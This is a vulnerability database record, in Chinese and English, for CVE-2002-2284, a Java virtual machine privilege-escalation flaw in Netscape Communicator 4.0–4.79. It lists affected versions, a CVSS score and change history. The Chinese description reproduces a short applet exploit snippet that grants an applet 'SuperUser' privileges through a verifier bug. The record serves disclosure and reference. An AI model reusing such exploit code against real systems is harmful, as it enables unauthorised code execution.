CVE-2002-2284 (CNNVD-200212-443)
中文标题:
Netscape Java虚拟机不安全调用漏洞
英文标题:
Netscape Communicator 4.0 through 4.79 allows remote attackers to bypass JVM security and execute ar...
漏洞描述
中文描述:
Netscape Communicator/Navigator的JVM实现使用了Symantec Just In Time(JIT)编译器,Java虚拟机在共享动态实现,并默认被Netscape Browser使用。 Netscape 4浏览器Java虚拟机实现由于部分方法被调用的时候不安全,远程攻击者可以利用这个漏洞构建恶意Java Applet,在JVM环境中装载恶意类而可能以高权限执行任意代码。 构建如下applet代码运行在Netscape 4.x web浏览器中可以导致权限提升: PrivilegeManager pm=PrivilegeManager.getPrivilegeManager(); VerifierBug bug=new VerifierBug(); MyPrivilegeManager mpm=bug.cast2MyPrivilegeManager(pm); Target target=Target.findTarget("SuperUser"); Privilege priv=Privilege.findPrivilege(Privilege.ALLOWED,Privilege.FOREVER); PrivilegeTable privtab=new PrivilegeTable(); privtab.put(target,priv); Principal principal=PrivilegeManager.getMyPrincipals()[0]; mpm.itsPrinToPrivTable.put(principal,privtab); try { ClassLoader cl=getClass().getClassLoader(); Class c=cl.loadClass("Beyond"); c.newInstance(); } catch (Throwable e) {} 获得Privilege Manager object引用指针的值并保存在pm变量中,然后可利用Netscape JVM中的一个缺陷结合其他漏洞提升权限。 实际提升权限的攻击在如下代码中: Principal principal=PrivilegeManager.getMyPrincipals()[0]; mpm.itsPrinToPrivTable.put(principal,privtab); 首先,从PrivilegeManager类的Principal列表中获取一个Principal的引用,然后修改mpm的成员变量itsPrinToPrivTable,以给用户applet类增加新的权限信息。成员变量itsPrinToPrivTable是一个hash表,它保存了类的Principals和权限列表之间的关联信息。这样的修改结果,使得一个用户applet类的Principal与系统权限表关联起来。显然,在缺省情况下,applet类的Principals有一个空的权限表,这里,将它们与系统权限表关联起来。
英文描述:
Netscape Communicator 4.0 through 4.79 allows remote attackers to bypass JVM security and execute arbitrary Java code via an applet that loads user-supplied Java classes.
CWE类型:
标签:
受影响产品
| 厂商 | 产品 | 版本 | 版本范围 | 平台 | CPE |
|---|---|---|---|---|---|
| netscape | communicator | 4.0 | - | - |
cpe:2.3:a:netscape:communicator:4.0:*:*:*:*:*:*:*
|
| netscape | communicator | 4.5 | - | - |
cpe:2.3:a:netscape:communicator:4.5:*:*:*:*:*:*:*
|
| netscape | communicator | 4.6 | - | - |
cpe:2.3:a:netscape:communicator:4.6:*:*:*:*:*:*:*
|
| netscape | communicator | 4.7 | - | - |
cpe:2.3:a:netscape:communicator:4.7:*:*:*:*:*:*:*
|
| netscape | communicator | 4.51 | - | - |
cpe:2.3:a:netscape:communicator:4.51:*:*:*:*:*:*:*
|
| netscape | communicator | 4.61 | - | - |
cpe:2.3:a:netscape:communicator:4.61:*:*:*:*:*:*:*
|
| netscape | communicator | 4.72 | - | - |
cpe:2.3:a:netscape:communicator:4.72:*:*:*:*:*:*:*
|
| netscape | communicator | 4.73 | - | - |
cpe:2.3:a:netscape:communicator:4.73:*:*:*:*:*:*:*
|
| netscape | communicator | 4.74 | - | - |
cpe:2.3:a:netscape:communicator:4.74:*:*:*:*:*:*:*
|
| netscape | communicator | 4.75 | - | - |
cpe:2.3:a:netscape:communicator:4.75:*:*:*:*:*:*:*
|
| netscape | communicator | 4.76 | - | - |
cpe:2.3:a:netscape:communicator:4.76:*:*:*:*:*:*:*
|
| netscape | communicator | 4.77 | - | - |
cpe:2.3:a:netscape:communicator:4.77:*:*:*:*:*:*:*
|
| netscape | communicator | 4.78 | - | - |
cpe:2.3:a:netscape:communicator:4.78:*:*:*:*:*:*:*
|
| netscape | communicator | 4.79 | - | - |
cpe:2.3:a:netscape:communicator:4.79:*:*:*:*:*:*:*
|
解决方案
中文解决方案:
英文解决方案:
临时解决方案:
CVSS评分详情
AV:N/AC:L/Au:N/C:P/I:P/A:N
时间信息
利用信息
数据源详情
| 数据源 | 记录ID | 版本 | 提取时间 |
|---|---|---|---|
| CVE | cve_CVE-2002-2284 |
2025-11-11 15:17:26 | 2025-11-11 07:32:18 |
| NVD | nvd_CVE-2002-2284 |
2025-11-11 14:50:28 | 2025-11-11 07:41:04 |
| CNNVD | cnnvd_CNNVD-200212-443 |
2025-11-11 15:08:41 | 2025-11-11 07:48:49 |
版本与语言
安全公告
变更历史
查看详细变更
- vulnerability_type: 未提取 -> 授权问题
- cnnvd_id: 未提取 -> CNNVD-200212-443
- data_sources: ['cve', 'nvd'] -> ['cnnvd', 'cve', 'nvd']
查看详细变更
- cvss_score: 未提取 -> 6.4
- cvss_vector: NOT_EXTRACTED -> AV:N/AC:L/Au:N/C:P/I:P/A:N
- cvss_version: NOT_EXTRACTED -> 2.0
- affected_products_count: 0 -> 14
- data_sources: ['cve'] -> ['cve', 'nvd']